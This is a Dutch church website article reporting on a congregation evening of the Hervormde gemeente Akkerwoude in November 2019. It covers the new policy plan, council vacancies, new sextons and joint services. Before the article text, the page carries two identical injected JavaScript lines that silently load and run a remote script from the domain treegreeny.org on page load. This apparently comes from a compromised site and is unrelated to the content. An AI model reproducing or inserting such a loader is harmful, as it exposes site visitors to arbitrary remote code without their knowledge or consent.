;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Verbinding … gemeenteavond Hervormd Akkerwoude 25 november 2019 - PKN Damwâld

Verbinding … gemeenteavond Hervormd Akkerwoude 25 november 2019

Gepubliceerd op: dinsdag 26 november 2019

Misschien is het wel het kostbaarste wat de kerk te bieden heeft: tijd en ruimte voor mensen om elkaar te ontmoeten. Met daarbij op de achtergrond de gedachte dat de Here God zich bij deze ontmoeting voegt … Verbinding, echt contact, aandacht voor het verhaal van de ander. Gezien en gehoord worden.

Verbinding …   de gemeenteavond op maandag 25 november in ’t Skûlplak bleek dan ook bij uitstek een prima gelegenheid te zijn om met elkaar in gesprek te gaan over het reilen en zeilen in onze gemeente. De talrijk aanwezige gemeenteleden werden door de kerkenraad op een vlotte wijze op de hoogte gebracht van de (financiële-) handel en wandel van onze gemeente. De kerkenraad is dankbaar dat een groot aantal gemeenteleden bereid is gevonden een zittingsperiode aan te vangen. De bevestigingsdienst zal D.V. 1 maart 2020 plaatsvinden. Zorgelijk is en blijft de bezetting bij met name het college van (jeugd-) ouderlingen waar nog een groot aantal vacatures resteren. Bemoedigend is daarbij overigens wel het stijgend aantal ‘wijkassistenten’ die hun schouders willen zetten onder het broodnodige gemeentewerk. Overigens, in het vervolg zal voor wat betreft de verkiezingsprocedure de PKN-kerkorde en ordinanties worden gevolgd en zal de plaatselijke regeling uit 2006 daarvoor binnenkort worden geactualiseerd.

Uiteraard werd er gesproken over het beleid van de kerkenraad en de toekomst van de gemeente. Ons nieuw beleidsplan 2019-2024 – met daaraan gekoppeld het Jongeren-beleidsplan 2019-2023 –  met de zeer treffende titel ‘Verbinding’  beschrijft wie we zijn, wat we als gemeente belangrijk vinden en waar we de komende jaren aan willen werken. We trekken in het beleidsplan een paar lijnen voor de volgende jaren waar we als gemeente meer aandacht aan willen geven. Dat beeld is niet compleet en het is de bedoeling om ieder jaar een moment te nemen om te evalueren wat erbij moet, af moet of herschreven kan worden. Rode draad binnen dit beleidsplan zijn drie kenmerkende woorden: Boven – binnen – buiten. Onze richting is op de Here gericht (Boven), zo sterken we elkaar; ontvangen van en geven aan de medegelovige (Binnen). Tegelijk zijn we een licht in deze wereld (Buiten) (Mat.5: 14 – 16), om ambassadeur of vertegenwoordiger te zijn van Jezus Christus. Vanuit die visie zijn we samen onderweg in afhankelijkheid van de Here, waarbij Gods Woord richtsnoer is voor de gemeente en voor ons leven.

Op verzoek zal een ‘papieren versie’ van het beleidsplan nog twee weken achter in de Bonifatiuskerk te verkrijgen zijn. Ook via deze website www.pkndamwald.nl is een digitale versie’ te lezen en te downloaden.  Tot 3 december 2019 kunnen nog op/aanmerkingen met betrekking tot het beleidsplan worden gericht aan de kerkenraad.

Anne en Mildred Talma zullen per 1 december 2019 officieel gaan fungeren als ‘kostersechtpaar’ binnen onze gemeente. Daarmee volgen ze Piet Veenstra op, die na een 25-jarig dienstverband per 31 december 2019 zijn werkzaamheden zal neerleggen. Het afscheid van Piet Veenstra laat vanwege ziekte nog enigszins op zich wachten, maar de bedoeling is dat Piet op binnenkort op passende wijze zal worden bedankt voor al zijn werkzaamheden. Saillant detail is overigens dat Anne Talma in de voetsporen zal treden van zijn oom Fokke, die in grote samenwerking met zijn broer Linze vanaf 1 januari 1964 meer dan dertig jaar koster onze gemeente is geweest. Voorzitter Sytse de Boer wenste Anne en Mildred Talma namens de gemeente Gods zegen toe in hun nieuwe functie en vervolgens bedankte hij alle ‘hulpkosters’ die zich in de afgelopen periode geweldig hebben gekweten van hun taak. Verder zal het project ‘zomeravond-diensten’ worden voortgezet. Het bleek dat de opkomst gedurende de proefperiode (juli 2019) bemoedigend was en derhalve zullen de diensten ook in 2020 in de maanden juli en augustus ’s avonds om 19.30 uur worden gehouden. Over het eventuele karakter van de diensten in die periode kan in dit stadium nog niets worden gezegd. In het verlengde van de gezamenlijke vieringen bij Hemelvaart en Pinksteren zal ook de oudejaarsdienst 2019 gezamenlijk met Gereformeerd Damwâld worden gehouden. De bedoeling is dat deze ‘kruislings’ worden gehouden: Hervormde voorganger in Gereformeerde kerk en visa versa.

Het mooie van een dergelijke gemeenteavond is dat je (weer) mag ‘ontdekken’ dat er naast alle betrokkenheid en positiviteit er binnen onze gemeente een sterke wilskracht bestaat om samen één mooie en levendige geloofsgemeenschap te vormen, die geworteld in Gods liefde en met oog voor elkaar en de wereld. Ja, het is heel bijzonder dat je elkaar op deze manier zo verbonden mag voelen!